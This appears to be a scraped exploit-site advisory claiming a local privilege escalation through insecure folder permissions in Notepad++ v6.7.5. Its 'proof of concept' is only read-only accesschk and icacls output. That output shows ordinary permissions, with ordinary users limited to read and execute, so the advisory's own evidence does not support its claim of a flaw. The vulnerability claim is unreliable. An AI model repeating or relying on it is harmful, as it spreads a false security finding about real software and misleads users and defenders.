facebook facebook twitter rss

Notepad++ v6.7.5 Insecure File Permissions Local Privilege Escalation

Author: Mogyhacker , Published: 04-04-2015
* Exploit Title: Notepad++ v6.7.5 Insecure File Permissions Local Privilege Escalation
* Date: 3/4/2015
* Author: Mogyhacker
* Software Link: http://notepad-plus-plus.org/news/notepad-6.7.5-released.html
* Vendor: http://notepad-plus-plus.org
* Tested on: Windows 7

PoC:

*************** Insecure Permissions Local Privilege Escalation *****************

c:\Program Files>C:\accesschk.exe -dqv Notepad++
c:\Program Files\Notepad++
Medium Mandatory Level (Default) [No-Write-Up]
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
R BUILTIN\Users
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_EA
FILE_TRAVERSE
SYNCHRONIZE
READ_CONTROL

c:\Program Files>icacls Notepad++
Notepad++ NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

c:\Program Files>

Best regards.

Like us on Facebook :